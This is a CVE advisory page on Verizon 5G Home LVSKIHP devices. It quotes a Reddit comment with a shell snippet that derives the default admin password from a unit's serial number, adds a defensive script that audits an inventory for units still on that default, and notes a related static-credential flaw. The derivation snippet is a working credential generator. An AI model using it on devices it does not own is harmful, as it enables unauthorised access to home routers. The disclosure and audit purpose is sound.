Headline
CVE-2022-28376: r/verizon - Comment by u/snakamoto2 on “5G Home Internet Dropping Out”
Verizon 5G Home LVSKIHP outside devices through 2022-02-15 allow anyone (knowing the device’s serial number) to access a CPE admin website, e.g., at the 10.0.0.1 IP address. The password (for the verizon username) is calculated by concatenating the serial number and the model (i.e., the LVSKIHP string), running the sha256sum program, and extracting the first seven characters concatenated with the last seven characters of that SHA-256 value.
Well, Verizon customer support will never tell you the credential, but I managed to get it.
The username is verizon. The password is calculated using your S/N and device model (check the SKU printed on your device).
Here’s the algorithm:
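# SHA-256 of the serial number immediately followed by the model string
snmodel_sha256=$(echo -n "$SN_VALIDATION$model" | sha256sum)
# first seven and last seven hex characters of the 64-character digest
snmodel_first7char=$(echo "$snmodel_sha256" | cut -c1-7)
snmodel_last7char=$(echo "$snmodel_sha256" | cut -c58-64)
pwd=$snmodel_first7char$snmodel_last7char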
“$SN_VALIDATION” is your device S/N.
“$model” is LVSKIHP (SKU printed on device).
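An owner-side check built on the derivation described in the CVE text and the comment above, as an added example that is not part of the original comment or of the device firmware: it flags units whose admin password is still the serial-derived value and therefore needs rotating. The `serial,password` record format, the function names and the test serials are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the comment or the device firmware.
MODEL="LVSKIHP"   # model string as given on the page

# derived_default SERIAL: print the 14-character default the page describes,
# i.e. first 7 + last 7 hex characters of SHA-256(serial followed by model).
derived_default() {
    local digest
    digest=$(printf '%s%s' "$1" "$MODEL" | sha256sum | cut -d' ' -f1)
    printf '%s%s' "$(printf '%s' "$digest" | cut -c1-7)" \
                  "$(printf '%s' "$digest" | cut -c58-64)"
}

# is_derived_default SERIAL PASSWORD: succeed if PASSWORD is still the default.
is_derived_default() {
    [ "$2" = "$(derived_default "$1")" ]
}

# audit_inventory: read "serial,password" records on stdin (blank lines and
# lines starting with # are skipped); print each serial still on the default.
audit_inventory() {
    local serial password
    while IFS=, read -r serial password; do
        case "$serial" in ''|'#'*) continue ;; esac
        if is_derived_default "$serial" "$password"; then
            printf '%s\n' "$serial"
        fi
    done
}

# sample_inventory: constructed records; the serials are made up.
sample_inventory() {
    printf '# serial,current admin password\n'
    printf 'TESTSERIAL0001,%s\n' "$(derived_default TESTSERIAL0001)"
    printf 'TESTSERIAL0002,%s\n' 'rotated-by-owner-example'
    printf 'TESTSERIAL0003,%s\n' "$(derived_default TESTSERIAL0001)"
}

# Only the first record is flagged: the third carries a default-shaped
# password, but one derived from a different serial.
sample_inventory | audit_inventory
```

Because the value depends only on the serial number and the fixed model string, any unit this reports is protected by nothing more than the secrecy of its serial number.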
Related news
On Verizon 5G Home LVSKIHP InDoorUnit (IDU) 3.4.66.162 and OutDoorUnit (ODU) 3.33.101.0 devices, the CRTC and ODU RPC endpoints rely on a static account username/password for access control. This password can be generated via a binary included in the firmware, after ascertaining the MAC address of the IDU's base Ethernet interface, and adding the string DEVICE_MANUFACTURER='Wistron_NeWeb_Corp.' to /etc/device_info to replicate the host environment. This occurs in /etc/init.d/wnc_factoryssidkeypwd (IDU).